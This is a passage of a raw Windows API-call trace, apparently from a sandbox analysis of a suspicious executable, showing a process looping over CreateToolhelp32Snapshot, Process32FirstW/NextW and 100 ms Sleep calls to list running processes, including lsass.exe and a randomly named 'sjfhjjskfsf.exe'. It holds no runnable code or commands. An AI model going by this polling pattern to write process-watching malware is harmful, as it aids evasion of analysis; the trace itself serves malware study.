lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.994] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.995] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.995] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.995] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.995] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.996] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.996] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0213.996] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.997] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.997] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.997] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.998] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.998] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.998] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.999] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.999] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0213.999] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.000] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.000] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.000] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.001] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.001] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0214.001] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0214.002] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.002] Process32NextW (in: hSnapshot=0x148, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0214.002] Sleep (dwMilliseconds=0x64) [0214.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14c [0214.112] Process32FirstW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.112] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.113] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.113] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.113] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.114] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.114] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.114] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.115] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.115] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0214.115] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.117] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.117] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.117] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.118] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.118] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.118] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.119] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.119] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0214.119] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.120] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.120] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.120] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.121] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.121] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0214.121] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0214.122] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.122] Process32NextW (in: hSnapshot=0x14c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0214.122] Sleep (dwMilliseconds=0x64) [0214.228] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x150 [0214.241] Process32FirstW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.241] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.242] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.245] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.247] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.256] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.257] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.257] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.257] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.258] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0214.258] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.258] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.259] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.259] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.259] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.260] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.260] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.260] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.261] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0214.261] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.261] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.262] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.262] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.262] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.262] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0214.263] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0214.263] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.263] Process32NextW (in: hSnapshot=0x150, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0214.264] Sleep (dwMilliseconds=0x64) [0214.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x154 [0214.413] Process32FirstW (in: hSnapshot=0x154, lppe=0x18ebc4 | 